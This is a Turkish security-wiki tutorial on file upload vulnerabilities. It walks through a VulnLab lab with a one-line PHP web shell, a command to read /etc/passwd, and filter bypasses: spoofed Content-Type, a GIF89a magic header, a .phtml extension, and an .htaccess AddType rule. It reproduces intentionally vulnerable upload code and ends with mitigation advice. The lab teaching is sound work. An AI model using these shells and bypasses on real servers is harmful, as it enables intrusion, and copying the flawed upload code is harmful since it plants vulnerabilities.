Yavuzlar
Ana sayfaTelegram
  • Yavuzlar
  • VulnLab
  • CodinLab
  • 📚EĞİTİM
    • PHP
      • XAMPP kurulumu
      • VS Code Kurulum
      • 1.0 PHP Nedir
      • 1.1 Dosya Oluşturma
      • 1.2 Syntax (Yazım Kuralları)
      • 1.3 PHP'de Echo ve Print
      • 1.4 PHP'deki yorumlar
      • 1.5 PHP Değişkenleri
      • 1.6 Operatörler (Operators)
      • 1.7 Veri Türünü Alma
      • 1.8 PHP'de String
      • 1.9 PHP'de Sabitler
      • 2.0 PHP'de If Else Elseif
      • 2.1 Switch Case
      • 2.2 PHP'de Döngüler
      • 2.3 PHP'de Diziler (Arrays)
      • 2.4 PHP'de Süper Global Değişkenleri
      • 2.5 PHP'de Cookie (Çerez) Ve Session (Oturum) Yöntemleri
      • 2.6 Form işlemleri
    • C++
      • 1.0 Temeller
        • 1.1 Dosya Oluşturma
        • 1.2 Syntax (Yazım Kuralları)
        • 1.3 Yorum Satırları
        • 1.4 C++ Değişkenleri
          • 1.4.1 Değişken Türleri
        • 1.5 Operatörler (Operators)
        • 1.6 Namespace
        • 1.7 Kullanıcı Girdisi (User Input)
        • 1.8 C++ Stringleri (C++ Strings)
        • 1.9 Matematik (Math) Fonksiyonları
        • 1.10 Booleans
        • 1.11 If Else
        • 1.12 Switch
        • 1.13 While Döngüsü
          • 1.13.1 Do While Döngüsü
        • 1.14 For Döngüsü
        • 1.15 Break/Continue
        • 1.16 Diziler
        • 1.17 Structures
        • 1.18 Enums
        • 1.19 References
        • 1.20 Pointers
      • 2.0 Fonksiyonlar
      • 3.0 Sınıflar
        • 3.1 OOP
        • 3.2 Sınıflar ve Objeler
        • 3.3 Sınıf Methodları
        • 3.4 Yapıcılar (Constructors)
        • 3.5 Erişim Belirleyicileri (Access Specifiers)
        • 3.6 Kapsülleme (Encapsulation)
        • 3.7 Inheritance
        • 3.8 Polimorfizm (Polymorphism)
        • 3.9 Dosyalar (Files)
        • 3.10 İstisnalar (Exceptions)
        • 3.11 Tarih ve Zaman (Date and Time)
      • 4.0 Veri Yapıları (Data Structures)
        • 4.1 Veri Yapıları ve STL
        • 4.2 Vektörler (Vectors)
        • 4.3 Listeler (Lists)
        • 4.4 Yığınlar (Stacks)
        • 4.5 Kuyruklar (Queues)
        • 4.6 Deque (Çift Uçlu Kuyruk)
        • 4.7 Küme (Set)
        • 4.8 Maps
        • 4.9 Iterator
        • 4.10 Algoritmalar
  • 🛠️ARAÇLAR
    • Aircrack-ng
    • Airgeddon
    • Arjun
    • BeEF
    • Bettercap
    • Docker
    • Gelişmiş Wireshark Kullanımı (Advanced Wireshark Usage)
    • Google Dorks
    • Hping3
    • John the Ripper
    • Metasploit Framework
    • Netcat
    • Nmap
    • OSINT Framework
    • PEASS-ng
    • Sublist3r
    • XSS Scanner
    • Wireshark
    • ZAP
    • HYDRA
  • 🖥️İŞLETİM SİSTEMLERİ
    • Linux101
    • MBR
  • 🔑KRİPTOLOJİ
    • Dijital Sertifika ve İmzalar
    • Sezar Şifrelemesi
    • Steganografi
    • Veri Şifreleme (Data Encryption)
  • 🔏Network
    • Domain Name Server (DNS)
    • Firewall Nedir? Nasıl Çalışır ?
    • Ortadaki Adam Saldırısı (Man In The Middle Attack)
    • OSI Modeli
    • Sanal Özel Ağlar (VPN)
    • World Wide Web (WWW)
  • 🔐PRIVILEGED
    • Docker Escape
  • 📨Protokoller
    • ARP
    • DHCP
    • FTP
    • HTTP/HTTPS
    • SSH
    • TCP/IP
    • UDP
    • Wİ-Fİ Güvenlik Protokolleri (WEP/WPA/WPA2/WPA3)
  • 💻SİBER TEHDİT İSTİHBARATI
    • Gelişmiş Siber Tehdit İstihbaratı Nedir?
  • 🔒WEB GÜVENLİĞİ
    • 403 ByPass
    • API Güvenliği (API Security)
    • Broken Access Control
    • Bulut Güvenliği (Cloud Security)
    • Command Injection
    • Cross Origin Resource Sharing
    • Cross Site Request Forgery (CSRF)
    • Cyber Kill Chain
    • DDoS Saldırıları
    • File Upload Zafiyeti Nedir?
    • HTTP Request Smuggling
    • Insecure Direct Object Reference (IDOR)
    • Incident Response
    • Local File Inclusion (LFI)
    • NoSQL Injection
    • Pentest 101
    • Race Condition
    • Server Side Request Forgery (SSRF)
    • Server Side Template Injection (SSTI)
    • Spring4Shell
    • Two Factor Authentication Bypass
    • XML External Entity Attack (XEE)
  • 🤖YAPAY ZEKA
    • ChatGPT for Hacking
    • Siber Güvenlik ve Yapay Zeka
    • Yapay Zeka ile Sahte Fotoğraf Tespiti
  • 🌐YAZILIM
    • Düzenli İfadeler (Regular Expressions)
    • Elasticsearch Nedir?
    • Front-end Teknolojileri
    • Golang'da Arayüzler (Interfaces)
    • Go'da Concurrency ve Uygulamaları
    • Güvenli Kodlama (Secure Coding)
    • Java Overloading vs Overriding
    • JSON Web Token (JWT)
    • Material-UI
    • NextJS Nedir?
    • ReactJS Kancalar (Hooks)
    • ReactJS Nedir?
    • Redux Toolkit
    • SOLID Yazılım Geliştirme Prensipleri
    • SQL 101
    • UI / UX Nedir?
    • Veri Taşıma Nedir? (Database Migration)
    • Versiyon Kontrol Sistemleri ve GIT
  • 🔷DİĞER
    • Bug Bounty (Hata Ödülü) Nedir?
    • Popüler Yazılımların Kurulumları
      • Ubuntu Server 24.04 LTS Kurulumu
      • Ubuntu için Güncel Docker Engine Kurlumu
    • Güvenlik Operasyonları Merkezi Nedir?
    • Honeypot (Bal Küpü)
    • IoT Güvenliği Nedir?
    • ShellShock Exploit
    • Yük Dengeleyici (Load Balancer) Nedir?
Powered by GitBook
On this page
  • File Upload Zafiyetlerinin Nedenleri
  • File Upload Zafiyetlerinin Neden Olduğu Tehlikeler
  • File Upload Zafiyeti ile Shell Yükleme
  • VulnLab File Upload Örnekleri
  • 1-Unrestricted
  • 2-MIME Type
  • 3-Magic Header
  • 4-Blacklist - 1
  • Blacklist - 2
  • File Upload Zafiyetini Önleme Yöntemleri

Was this helpful?

  1. WEB GÜVENLİĞİ

File Upload Zafiyeti Nedir?

PreviousDDoS SaldırılarıNextHTTP Request Smuggling

Last updated 5 months ago

Was this helpful?

File upload zafiyeti, web uygulamalarında kullanıcıların dosya yüklemesine izin veren mekanizmalarda ortaya çıkabilen ve ciddi güvenlik tehditlerine yol açabilen açıkları ifade eder. Bu zafiyetler, saldırganların kötü niyetli dosyalar yükleyerek sistemin güvenliğini tehlikeye atmalarına neden olabilir. Bu makalemizde, file upload zafiyetlerinin türleri, neden olduğu tehlikeler ve bu zafiyetlerden korunma yöntemleri detaylı bir şekilde ele alınacaktır.

File Upload Zafiyetlerinin Nedenleri

1. Dosya Türü Kontrollerinin Yetersiz Olması

Web uygulamaları, genellikle dosya türünü dosya uzantısına göre kontrol eder. Ancak bu yöntem yanıltıcı olabilir çünkü saldırganlar, zararlı dosyaları kabul edilen dosya türleriyle aynı uzantıya sahipmiş gibi gösterebilirler. Örneğin, bir PHP betiği içeren bir .jpg dosyası yükleyerek sunucuya zararlı kod bulaştırabilirler.

2. Dosya Adı Kontrollerinin Yetersiz Olması

Dosya isimlerinde özel karakterler veya uzantılar kullanarak zararlı kodları gizlemek mümkündür. Bu, komut enjeksiyonu veya dosya içeriklerinin yorumlanması gibi saldırılara neden olabilir. Örneğin, dosya adında "shell.php.jpg" gibi bir isim kullanarak PHP betiği içeren bir dosya yüklenebilir.

3. Yetersiz Dosya Boyutu Kontrolleri

Çok büyük dosyalar yükleyerek sunucunun kaynaklarını tüketme ve hizmet dışı bırakma (DoS) saldırılarına neden olmak mümkündür. Bu tür saldırılar, sunucunun performansını düşürebilir ve diğer kullanıcıların hizmetlere erişimini engelleyebilir.

4. Depolama Alanına Doğrudan Erişim

Yüklenen dosyalar doğrudan erişilebilir bir alana kaydediliyorsa, saldırganlar bu dosyaları çalıştırabilir ve sistemde yetkisiz işlemler yapabilirler. Bu durum, saldırganların arka kapılar (backdoor) oluşturmasına ve sistem üzerinde tam kontrol sağlamasına yol açabilir.

5. Zararlı Kod İçeren Dosyalar

Yüklenen dosyalar kötü amaçlı yazılımlar, virüsler veya arka kapılar içerebilir. Bu dosyalar, sisteme bulaşarak veri hırsızlığı, yetkisiz erişim veya diğer zararlı faaliyetler gerçekleştirebilir.

File Upload Zafiyetlerinin Neden Olduğu Tehlikeler

File upload zafiyetleri çeşitli güvenlik tehditlerine yol açabilir:

  • Yetkisiz Erişim: Kötü niyetli dosyalar yüklenerek sunucuda yetkisiz işlemler yapılabilir.

  • Veri Hırsızlığı: Saldırganlar, yükledikleri dosyalar aracılığıyla veri tabanına veya diğer kritik sistem bileşenlerine erişim sağlayabilirler.

  • Sistem Kontrolünün Ele Geçirilmesi: Arka kapılar oluşturularak sistem üzerinde tam kontrol sağlanabilir.

  • Servis Dışı Bırakma (DoS) Saldırıları: Aşırı büyük dosyalar yüklenerek sunucunun performansı düşürülebilir ve hizmetler aksatılabilir.

File Upload Zafiyeti ile Shell Yükleme

Şimdi shell yükleme işlemlerini Yavuzlar takımının geliştirdiği VulnLab projesinde deneyelim.

VulnLab File Upload Örnekleri

1-Unrestricted

Bu örnekte bizi bir dosya yükleme sayfası karşılıyor. İlk olarak Wappalyzer ile sitenin hangi dilde yazıldığını öğrenelim.

Wappalyzer sitenin programlama dilinin PHP olduğunu bize gösteriyor.

İlk olarak siteye bir shell.php yüklemeye çalışalım.

shell.php
<?php system($_GET['cmd']); ?>   // Basit Bir Shell Kodu

Bu örnekte hiçbir kısıtlama olmadan shell dosyasının yüklendiğini görüyoruz. Daha sonrasında yüklediğimiz dosyaya gidip cmd parametresi ile sistemde istediğimiz kodu çalıştırabiliyoruz. Ben /etc/passwd dosyasının içeriğini okumayı tercih ettim.

Zafiyetli Kaynak Kod

Kaynak kodda da göründüğü gibi herhangi bir güvenlik önlemi alınmadan dosyanın direk yüklendiğini görüyoruz.

    if( isset($_POST['submit']) ){

        $tmpName = $_FILES['input_image']['tmp_name'];
        $fileName = $_FILES['input_image']['name'];

        if(!empty($fileName)){
            if(!file_exists("uploads")){
                mkdir("uploads");
            }
    
            $uploadPath = "uploads/".$fileName;
    
            if( @move_uploaded_file($tmpName,$uploadPath) ){
                $status = "success";
                
            }else{
                $status = "unsuccess";
            }
        }else{
            $status = "empty";
        }
    }

2-MIME Type

Bu örnekte php dosya shell.php dosyasını yüklemeye çalıştığımızda izin verilmeyen dosya türü olduğunu bize bildiriyor. Buraya shell yükleyebilmemiz için dosyanın MIME Type' ını değiştirmemiz gerek. Bunun için Burp Suite ile dosya yükleme sırasında araya girip Content-Type değerini image/jpeg yapmamız gerekiyor.

Ve shell.php dosyasının yüklendiğini görüyoruz. Yukarıdaki örnekteki gibi yüklediğimiz dosyaya gidip komut çalıştırabiliriz.

Zafiyetli Kaynak Kod

Kaynak kodda da göründüğü dosyanın gibi image/gif, image/jpeg, image/png dosya tiplerinin desteklendiğini görüyoruz. Fakat başka bir koruma yöntemi olmadığı için Burp Suite gibi bir araçla araya girip Content-Type değerini değiştirerek dosyayı yükleyebiliyoruz.

if( isset($_POST['submit']) ){

    $tmpName = $_FILES['input_image']['tmp_name'];
    $fileName = $_FILES['input_image']['name'];

    if(!empty($fileName)){
        $fileType = $_FILES['input_image']['type']; //MIME Type
    
        $extensions = array("php");

        if(!file_exists("uploads")){
            mkdir("uploads");
        }
        
        $uploadPath = "uploads/".$fileName;

        if( $fileType == "image/gif" || $fileType == "image/jpeg" || $fileType == "image/png"){

            if( @move_uploaded_file($tmpName,$uploadPath) ){
                $status = "success";
                
            }else{
                $status = "unsuccess";
            }

        }else{
            $status = "blocked";
        }
    }else{
        $status = "empty";
    }


}

3-Magic Header

Bu örnekte ise yine aynı şekilde php uzantılı dosyalar yüklenmiyor. Fakat bu sefer mime type değiştirerek bypass edemiyoruz.

Bu sefer başka bir yöntem olan Magic Header değiştirme yöntemini kullanacağız.

Yine aynı şekilde burp suite ile araya girip php kodunun üzerine GIF uzantısının sihirli başlığı olan GIF89a yazısını ekliyoruz.

Ve shell.php dosyasının yüklendiğini görüyoruz.

Zafiyetli Kaynak Kod

Bu kaynak kodda da mime_content_type() fonksiyonu ile yüklenecek dosyanın mime type kontrolü yapılıyor. Burp suite ile araya girip mime type değerini değiştirmek işe yaramıyor. Fakat Magic Header kontrolü yapılmadığı için dosya yüklenebiliyor.

    if( isset($_POST['submit']) ){

        $tmpName = $_FILES['input_image']['tmp_name'];
        $fileName = $_FILES['input_image']['name'];

        if(!empty($fileName)){

            $extensions = array("php");
        
            if(!file_exists("uploads")){
                mkdir("uploads");
            }
    
            $uploadPath = "uploads/".$fileName;
            
            if( mime_content_type($tmpName) == "image/gif" || mime_content_type($tmpName) == "image/png" || mime_content_type($tmpName) == "image/jpeg" ){
    
                if( @move_uploaded_file($tmpName,$uploadPath) ){
                    $status = "success";
                    
                }else{
                    $status = "unsuccess";
                }
    
            }else{
                $status = "blocked";
            }

        }else{
            $status = "empty";
        }

    }

4-Blacklist - 1

Bu örnekte ise yine aynı şekilde php uzantılı dosyalar yüklenmiyor. Fakat bu sefer mime type ve magic header yöntemleri de işlemiyor. Büyük ihtimal php uzantısının kara listeye alındığını düşünüyoruz.

Bu kara listeyi atlatmak için .php uzantısını .phtml olarak değiştirebiliriz. .html uzantısı, .php uzantısı ile aynı şekilde çalışır, ancak dosyanın içeriğinin hem PHP hem de HTML kodu içerebileceğini belirtir.

Göründüğü gibi shell.phtml dosyası yüklendi. Bu şekilde shell yüklenebilir ve kod çalıştırılabilir.

Zafiyetli Kaynak Kod

Kaynak kodda da göründüğü gibi php uzantısı 9. satırda dizin içerisini eklenmiş. 17. satıda dosya uzantısının yasaklı uzantılar listesinde olup olmadığını ve dosya adının ".htaccess" olup olmadığını kontrol ediyor. Bu kara liste .phtml gibi farklı uzantılı dosyalar ile atlatılabiliyor. Dosya adının .htaccess olması olayını bir sonraki örnekte anlatıyor olacağım.

if( isset($_POST['submit']) ){

    $tmpName = $_FILES['input_image']['tmp_name'];
    $fileName = $_FILES['input_image']['name'];
    
    if(!empty($fileName)){

        $fileExt = pathinfo($fileName)['extension'];
        $extensions = array("php");

        if(!file_exists("uploads")){
            mkdir("uploads");
        }

        $uploadPath = "uploads/".$fileName;

        if( !in_array($fileExt,$extensions) && trim($fileName) != ".htaccess"){

            if( @move_uploaded_file($tmpName,$uploadPath) ){
                $status = "success";
                
            }else{
                $status = "unsuccess";
            }

        }else{
            $status = "blocked";
        }

    }else{
        $status = "empty";
    }
}

Blacklist - 2

Bu örnekte yukarıdaki atlatma yöntemlerinin hiçbiri işe yaramıyor. Büyük ihtimal birçok uzantının kara listeye alındığını düşünüyoruz.

Peki kendi .php uzantımızı oluşturabilir miyiz? Ve sistemin kendi oluşturduğumuz .php uzantısını yorumlamasını sağlayabilir miyiz? Evet. Bunun için .htaccess adında bir dosyayı sisteme yüklememiz gerek.

.htaccess Dosyası Nedir?

.htaccess (Hypertext Access) dosyası, Apache HTTP Sunucusu tarafından kullanılan ve web sunucusunun belirli dizinlerindeki ayarları yapılandırmak için kullanılan yapılandırma dosyasıdır. Bu dosya, web sunucusuna belirli dizinler için çeşitli ayarları ve direktifleri uygular.

Bunun için web sitenin Apache HTTP Sunucusu kullanması gerekiyor. Wappalyzer uzantısından web sunucusunun Apache olduğunu öğrenebiliyoruz.

İlk olarak .htaccess dosyasının içeriğini düzenlememiz gerek.

.htaccess
AddType application/x-httpd-php .php16

Örneğin, AddType application/x-httpd-php .php16 ifadesi, .php16 uzantısına sahip dosyaların PHP dosyaları olarak işlenmesini sağlar. Bu, sunucunun .php16 dosyalarını PHP kodu olarak yorumlayıp çalıştırması gerektiği anlamına gelir.

.htaccess dosyasını oluşturduktan sonra sisteme yüklememiz gerek.

Bu şekilde .htaccess dosyasını yüklediğimiz zaman artık .php16 dosyalarını sistemde yorumlanabilir hale getiriyoruz.

Ve artık yüklediğimiz shell.php16 dosyası ile sistemde kod yürütebiliriz.

File Upload Zafiyetini Önleme Yöntemleri

  • Dosya Türü ve Boyut Kontrolleri:

    • Uygulamanın dosya yükleme işlevselliği, yalnızca belirli dosya türlerini (örneğin, resim dosyaları, belge dosyaları) kabul etmelidir. Geçersiz dosya türlerinin yüklenmesini önlemek için dosya uzantılarını ve MIME türlerini doğrulamak önemlidir.

    • Ayrıca, dosya boyutu sınırlamaları uygulanmalıdır. Aşırı büyük dosyaların yüklenmesi, sunucu kaynaklarının aşırı yüklenmesine ve hizmet kesintilerine neden olabilir.

  • Dosya Doğrulama ve Karantina:

    • Yüklenen dosyaların içeriği otomatik olarak taranmalı ve güvenli olup olmadığı doğrulanmalıdır. Bu, antivirüs yazılımı veya özel dosya tarayıcıları kullanılarak yapılabilir.

    • Şüpheli dosyalar karantinaya alınmalı ve güvenlik ekibi tarafından incelenmelidir. Bu dosyaların potansiyel olarak zararlı olduğu belirlenirse, işlem durdurulmalı ve kullanıcıya bildirim gönderilmelidir.

  • Yetkilendirme ve Kimlik Doğrulama:

    • Dosya yükleme işlevselliğine erişim, yalnızca yetkilendirilmiş kullanıcılara sağlanmalıdır. Kullanıcıların kimlik doğrulaması yapılmalı ve gerektiğinde çift faktörlü kimlik doğrulama gibi ek güvenlik önlemleri uygulanmalıdır.

    • Kullanıcı rolleri ve izinleri dikkatlice yönetilmelidir. Kullanıcıların yalnızca ihtiyaç duydukları minimum erişim düzeyine sahip olmaları sağlanmalıdır.

  • Dosya Adı Değiştirme ve Güvenli Depolama:

    • Dosya adları, öngörülemeyen davranışları önlemek için kontrol edilmeli ve gerektiğinde yeniden adlandırılmalıdır. Örneğin, otomatik olarak üretilen dosya adları, saldırganların dosya yüklemelerini tahmin etmesini zorlaştırabilir.

    • Yüklenen dosyalar, güvenli bir depolama alanında saklanmalıdır. Bu depolama alanı, doğrudan web kök dizinine erişilemeyen ve yetkisiz erişime karşı korunan bir klasör olmalıdır.

  • Güvenlik Güncellemeleri ve Testler:

    • Uygulamanın dosya yükleme işlevselliği düzenli olarak güvenlik açıkları ve zafiyetler açısından taranmalıdır. Güvenlik açıkları tespit edildiğinde, hızlı bir şekilde düzeltilmelidir.

    • Uygulama geliştirme sürecinde, güvenlik testleri ve denetimleri düzenli olarak yapılmalıdır. Bu testler, dosya yükleme işlevselliğinin güvenliğini ve bütünlüğünü doğrulamaya yardımcı olur.

File upload zafiyeti ile sistemde kod yürütebileceğimiz shell dosyaları yüklenebilir. Fakat öncelikle web sitesinin hangi dil ile yazıldığını öğrenmemiz gerek. Bunun için tarayıcınıza uzantısını kurabilirsiniz.

Bu tarz basit çaplı bir shell dosyası kullanmak istemiyorsanız kullanabilirsiniz. Bu şekilde daha anlaşılır ve kullanılması kolay bir shell dosyası yükleyebilirsiniz.

🔒
Wappalyzer
p0wny-shell
eneskrkmz - OverviewGitHub
Bu yazı M. Enes Korkmaz tarafından hazırlanmıştır.
Logo